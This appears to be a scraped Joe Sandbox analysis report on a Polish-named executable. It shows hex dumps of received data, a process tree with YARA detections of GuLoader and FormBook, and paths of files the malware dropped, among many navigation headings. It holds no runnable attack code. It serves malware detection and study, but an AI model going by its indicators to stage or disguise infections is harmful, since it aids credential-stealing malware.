2025-03-05 13:45:40 UTC	16384	IN	Data Raw: 12 51 68 fb 58 21 3b 79 8c 0f 17 97 82 86 18 82 a8 b0 91 ab 41 8f 88 b8 29 47 39 3c 1b e1 0a 1a b8 97 81 56 4b 7a b7 dd bf c3 af f2 4d 29 70 1e f1 96 35 11 95 a2 f1 7d 21 28 df c2 c6 aa 16 1a 95 df ec 36 df 94 74 1c d7 fd 4e 8f b8 e6 14 bd 7e 7b 0c db 43 36 ff 78 d8 1e a2 ae 88 50 d9 a2 14 a9 ea 2f 21 9f 4d 15 01 04 db 15 fa ce 53 5c ce 64 10 87 bb bc bb fd 52 31 0a 3c cf 0b 1e 29 ff ec a0 2e d6 9d 9f f3 28 65 a2 6c fe b5 be fe 20 8f 70 09 c4 e2 b4 a8 64 1d 3b 22 1c 69 39 c0 df 6c 81 30 d4 f4 bd 1b 55 ff d8 ec 16 54 f8 21 ea f2 e0 81 a7 8b 60 c9 b4 92 da de 8a ad 71 7f a2 74 1e 16 6c 3a 4e 00 57 91 ac 9f 7d 52 47 8f 4e 42 3c 31 2b d2 31 44 b4 72 b0 25 f7 98 9b fa 5a f7 01 2a 59 0c 17 8c 37 b9 58 45 a1 29 45 36 c0 4a 83 76 0e dc 88 6d 33 48 19 7e 56 bf ee Data Ascii: QhX!;yA)G9<VKzM)p5}!(6tN~{C6xP/!MS\dR1<).(el pd;"i9l0UT!`qtl:NW}RGNB<1+1Dr%Z*Y7XE)E6Jvm3H~V
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: cc 7b fb 30 98 fa 17 c1 bb f6 40 fc 9a d0 5d 7a 83 37 15 29 99 ca f6 b2 97 85 ee 01 3b 19 dc d4 02 11 62 21 b9 13 b2 32 5d 6d af 6a 74 42 7f b2 50 2a 9b 15 fd 41 ea 6e 88 7c d2 7b 4d b9 80 d2 c7 e1 6b 53 24 ec da 71 1a 6b 6f 69 c9 f5 fd 7f 61 46 db d3 9d 98 71 dc 72 2a a5 d1 b2 ed 75 a7 97 c1 c0 ee 26 b8 34 2d 49 09 5d d0 70 19 ce 4f e2 e0 60 fb 8c eb 34 88 fa 9c 88 c1 2f 2c ab 43 01 67 b5 b8 cb a1 57 27 33 c8 43 fe 9d 9b c6 f3 5a 07 a3 4a 6a dc 50 cd 80 d0 d4 12 d6 ef 5b 4b b1 c3 4e 9e 1c bf 1c 6e 87 e3 d3 5e 73 94 30 31 e5 79 3e 4c 94 e0 4b c3 0e d8 b8 75 7f 08 c9 2b 09 9a 96 bb 8b 92 e0 23 33 b6 fa 62 88 5f 7d ff 75 8f 3f ad b2 23 65 5c c8 1e 3c 5d a3 53 c0 6a 3c b6 1f de 67 17 eb a3 e3 28 02 9c 66 13 d4 50 99 36 44 0c de 63 14 16 b8 19 d4 2d 01 2f 11 Data Ascii: {0@]z7);b!2]mjtBPAn\|{MkS$qkoiaFqru&4-I]pO`4/,CgW'3CZJjP[KNn^s01y>LKu+#3b_}u?#e\<]Sj<g(fP6Dc-/
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: c9 e2 6e b7 5d 5f 06 04 0b 29 4e 72 bf 35 4a b8 4e 7c bd 42 cd 6a d7 0d 72 e7 3e 18 0e b5 41 fa 7a cf 1d e2 3e 3f ec f3 cc 94 e9 64 b1 9f 9f 63 f0 dc ec 58 e1 13 49 a4 5b 89 ba 01 22 90 44 a4 bf 6b b6 a1 d6 9c ac 10 b2 74 9d dc d6 b8 15 4e 91 80 9b 69 7b 47 37 05 bf 16 28 5d ef 09 54 d5 ed d1 f9 72 3c 1d ec f5 b2 30 dd 58 ff b3 1b 81 34 85 d7 f4 7e 33 dd 74 26 95 2c 59 40 7a 66 5f d6 d6 fa 6e da 32 c6 1c 94 f5 92 31 00 68 9e e4 76 51 41 e0 c6 b0 45 0e e4 9f 28 88 d2 48 5a b2 15 b1 4e 70 17 dc b4 b9 ec f7 85 b8 ec bf bc bf 88 a2 4a 98 5a 2e 8f e6 f1 b6 95 20 85 ee e1 cc 4a 15 a4 e4 df 4b 38 7a 08 1e e6 dc 0d 72 ad 14 d3 36 e1 9e b4 9c 07 69 35 ea 4e 8e ce 42 43 5b 06 d1 a1 3a e7 d8 45 e7 e3 65 49 27 a6 05 dd 53 d9 6d ac 8a 20 97 11 bd e4 7d 64 f2 d2 ab 00 Data Ascii: n]_)Nr5JN\|Bjr>Az>?dcXI["DktNi{G7(]Tr<0X4~3t&,Y@zf_n21hvQAE(HZNpJZ. JK8zr6i5NBC[:EeI'Sm }d
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: d1 59 c6 71 4b 91 f1 03 9e 3a 88 7a 48 ef 47 91 e8 18 c9 a0 07 6a 1e 71 58 fe 3e 72 8c 00 9f 8b 8a 6b cf c2 8c 88 a4 e7 7d a7 1f 2c f0 15 06 75 be dd f0 13 66 6a 57 31 6c d8 b2 46 73 bf 73 34 6e fc b9 d5 46 ce ae b8 1e 16 52 a2 2b 13 ab 6f b0 80 34 d8 2a 7d 10 3a ca 66 7a d8 ef 95 34 3a 98 a5 96 20 c6 42 2c be 24 d0 ef a7 a8 35 f2 be 3b 55 75 6e 1b 5a 96 74 7f a5 59 08 85 f2 11 ae 2c 20 6d e2 3e d1 f9 d5 d1 3f 95 76 63 e9 e5 fc 54 b2 b1 a9 0c e2 47 d8 4b 98 62 6b da dc a1 49 e8 7a 19 9a 8b 12 8a 8e 86 a5 7a 02 34 21 ff 6b 5b 41 05 2f 16 b5 46 29 e3 3c 0b 82 eb 0e 95 8d 8b 21 5f 84 d7 4d 54 cf 86 66 a6 97 09 e2 4e 1b dc e9 cf 76 ae 60 88 d0 fd de 41 17 44 ab b9 18 31 74 40 fd 52 aa fd 8c 57 77 1c 50 d3 cb e2 75 01 ca 2f a2 74 f2 ab 52 7e e8 78 3a 67 f1 1d Data Ascii: YqK:zHGjqX>rk},ufjW1lFss4nFR+o4*}:fz4: B,$5;UunZtY, m>?vcTGKbkIzz4!k[A/F)<!_MTfNv`AD1t@RWwPu/tR~x:g
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: 83 db 7d dc 3e a6 a6 9c 00 9a 4a e3 b2 c5 87 04 19 5a f9 d9 b8 14 5b f9 0b c6 2d 42 7d 53 9c 3f 67 32 ca b5 71 44 3b 0a 37 12 f6 f9 69 22 89 8b f6 a2 bc 03 6a 89 bf 50 68 49 1c 74 43 b2 db c2 69 d6 d3 fd 31 b5 b7 93 de a4 e4 ed 37 89 20 63 0d 26 1c a2 4b c5 33 b7 27 a9 ad 47 f1 f5 f5 bc 79 45 0c c7 6b f1 60 93 05 fa 06 71 35 73 e7 fb c5 7f 8e 59 1f 35 1e 8e 9a 72 01 22 03 2e ac 48 02 16 42 91 95 4c fd 34 eb 75 c5 0a 62 a7 3b bc f0 99 91 90 b6 a9 46 a0 c1 04 71 d0 bc 1d c9 95 87 ce 0e b8 45 be 6f 8f fd 5c 5b f1 cf ce a3 b5 fd e3 4b 8e 06 33 d4 82 fe 3f e0 bc 31 ee 8e f4 ae ae 2e 58 7f 70 79 75 17 03 18 8d 08 a8 48 fb b5 a9 fd 4d 4d 63 1f 52 79 f7 a9 7a 19 da 49 24 14 f7 a1 8a 43 d2 21 d6 89 12 6e cb 99 c1 3f 7a ae dd 4f ee 8d 8a 23 8b 7d 2c c7 75 2c 00 7e Data Ascii: }>JZ[-B}S?g2qD;7i"jPhItCi17 c&K3'GyEk`q5sY5r".HBL4ub;FqEo\[K3?1.XpyuHMMcRyzI$C!n?zO#},u,~
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: 8a 3b 38 cb 81 a9 2d 4a 37 61 d7 b8 f8 0d c9 33 b5 c2 da 65 49 86 90 e6 2d c7 03 fa cd 3e 35 10 62 31 22 64 24 f2 6e 7d 75 24 5c 86 43 25 ab 1a c1 5c 27 9b 97 c7 ec 9d 43 83 1a 87 e7 46 5c 48 0c 53 51 3e 61 4d a2 16 85 d9 d1 e9 dd 41 05 98 d8 d0 f3 f8 b3 a7 3d 9e 94 6d 12 b7 ef 38 40 2b a8 6c e9 44 c1 1e 85 7c b4 13 b1 68 9a 85 ac d5 30 d9 34 90 29 d1 a5 f2 78 7c 36 49 9c 10 36 ce bf 79 04 68 2d 8a 94 2c 53 9f fb 21 85 d7 bb 16 d2 ee 61 7d 8f 29 83 52 29 42 99 d5 57 25 18 ac 12 4a 6a 5a 2c 14 0b 60 50 e0 48 ad 9e ca 9d 66 6b 2a 6b 1b 83 d0 4e 83 43 7f 8e 69 ab 70 15 3a ba e8 8d c6 d3 81 ae e3 25 4b b2 69 41 fe 3f ed 7b b7 88 9d 80 a3 ad 59 bb 1b fe 88 ba 39 04 88 77 5a e1 e1 5e b5 7e 16 12 0f 04 00 6b d1 fa 6c a7 48 79 c9 9b 9b 50 24 fd 89 1f 44 d4 5f d8 Data Ascii: ;8-J7a3eI->5b1"d$n}u$\C%\'CF\HSQ>aMA=m8@+lD\|h04)x\|6I6yh-,S!a})R)BW%JjZ,`PHfk*kNCip:%KiA?{Y9wZ^~klHyP$D_
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: 38 db c6 3a 2a 1e 29 2f 24 98 8b 98 eb 25 b9 4b fc 80 a2 38 ae d8 24 54 12 b6 c4 d2 98 9a 65 76 17 12 c0 5c b8 ca 87 95 ad 21 cc bb aa 86 20 b5 cc b2 83 e6 4b 85 21 e6 64 ca e4 ca b5 43 c8 5f d2 27 a7 91 26 28 0a a6 dd 10 d6 86 21 15 55 7a 9e bc c5 f2 82 5c 3c dc d5 5e 85 d0 e0 8e 2d 3d d6 66 aa f2 6e fe eb 91 50 2f 42 a1 ee 56 7f b1 5f 22 86 c6 e7 5d 0c 56 9a a0 d4 e9 ea bc af 84 be 82 3a 33 aa a2 28 7b 42 05 86 5d b6 aa 81 2d b2 03 7b 51 54 8f 9d 0c 02 19 74 43 ea 5b 35 ee 47 8c 67 bf 17 d0 c7 0b 99 96 7a 86 53 ae ea bc 1b 97 ab b9 64 f6 ce 4b 72 26 9d 76 99 14 5f 5e c7 52 a3 f0 cb 6e 23 e9 00 4b d4 ea b6 c4 89 ee 94 e8 5c 5e 3a b3 1c a6 e5 b1 b0 7b a7 90 66 17 46 a0 12 4d b8 b0 75 d9 77 93 cf e3 24 89 14 dd 8f 0a ed e4 f8 3b 1a a9 81 87 96 3e 09 8e 19 Data Ascii: 8:*)/$%K8$Tev\! K!dC_'&(!Uz\<^-=fnP/BV_"]V:3({B]-{QTtC[5GgzSdKr&v_^Rn#K\^:{fFMuw$;>
2025-03-05 13:45:40 UTC	16384	IN	Data Raw: 8a fe c8 73 27 27 2b 65 92 87 58 45 1f 30 4b 21 95 3b e2 bb 36 34 55 2d 2d 13 ab ee 1d a0 67 72 4c ee d5 35 7c ed 65 16 c6 1e 18 0a 18 8a 1f 3f cb 77 4b 2a b4 09 2c 93 53 f6 2a f3 80 e7 ae 29 6e 79 c9 dc 60 4b fe 13 88 a5 4a a7 58 76 37 0d d3 57 99 f3 7c 9e 78 3d 2f 0e db 20 da 02 2f 2a 0b 92 bb e4 a4 86 85 b7 d8 8f 09 1e 3a b6 cf 3f 76 c0 73 1f 99 7b d7 da b8 35 e7 df 7c aa 0f 18 60 10 74 37 ad 39 75 cc 2e c4 60 a3 69 35 88 ba e7 42 6e 90 08 10 c9 69 68 21 45 5c 14 2c 76 61 d5 15 77 69 59 0a ae bf 93 ea a9 50 6e 6e 60 8c 2b 0c 8a ad ae 41 4c ae 14 a7 65 e3 7b 45 86 be b2 be d3 89 a8 5a 00 8c 29 9a d1 0d 16 e6 8d a7 3d 9f ca 38 9a ae 81 d9 c8 c0 d6 ac 11 62 c5 fe a6 8b 90 76 55 5d 50 50 43 12 f1 7e 5b 46 08 43 27 4c 7f ca c8 77 34 15 cf b1 2a dc 0b 3d 49 Data Ascii: s''+eXE0K!;64U--grL5\|e?wK,S)ny`KJXv7W\|x=/ /:?vs{5\|`t79u.`i5Bnih!E\,vawiYPnn`+ALe{EZ)=8bvU]PPC~[FC'Lw4=I

Target ID:	5
Start time:	08:45:14
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\Zamowienie_522025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Zamowienie_522025.exe"
Imagebase:	0x400000
File size:	618'286 bytes
MD5 hash:	6907177F927C1938C734040D386DA280
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1406033202.00000000042D1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:45:28
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\Zamowienie_522025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Zamowienie_522025.exe"
Imagebase:	0x400000
File size:	618'286 bytes
MD5 hash:	6907177F927C1938C734040D386DA280
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2065100585.00000000021C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2088072514.0000000032730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:21:36
Start date:	05/03/2025
Path:	C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\geReVnuBo4LX3.exe"
Imagebase:	0x540000
File size:	143'872 bytes
MD5 hash:	9C98D1A23EFAF1B156A130CEA7D2EE3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2518489403.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:21:37
Start date:	05/03/2025
Path:	C:\Windows\SysWOW64\RMActivate_ssp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\RMActivate_ssp.exe"
Imagebase:	0x160000
File size:	478'720 bytes
MD5 hash:	6599A09C160036131E4A933168DA245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2518505143.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2518455903.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2515600733.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	10:21:51
Start date:	05/03/2025
Path:	C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\nmm1Kmw0.exe"
Imagebase:	0x540000
File size:	143'872 bytes
MD5 hash:	9C98D1A23EFAF1B156A130CEA7D2EE3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	10:22:04
Start date:	05/03/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Zamowienie_522025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6495-78B

C:\Users\user\AppData\Local\Temp\nsw158B.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Aktion.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\backhauls.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\backupen.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\joviniamish.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\recheer.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\terrespils.spa

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\Skruebladets\usneas.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Latteranfaldene\asymtote.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Nannandrium.fre

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Sciography.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Epichile\Substantiable.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Fjantendes.Sti

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\enterocrinin\effluents\Wisshe\Havaal.Rit

Windows Analysis Report
Zamowienie_522025.exe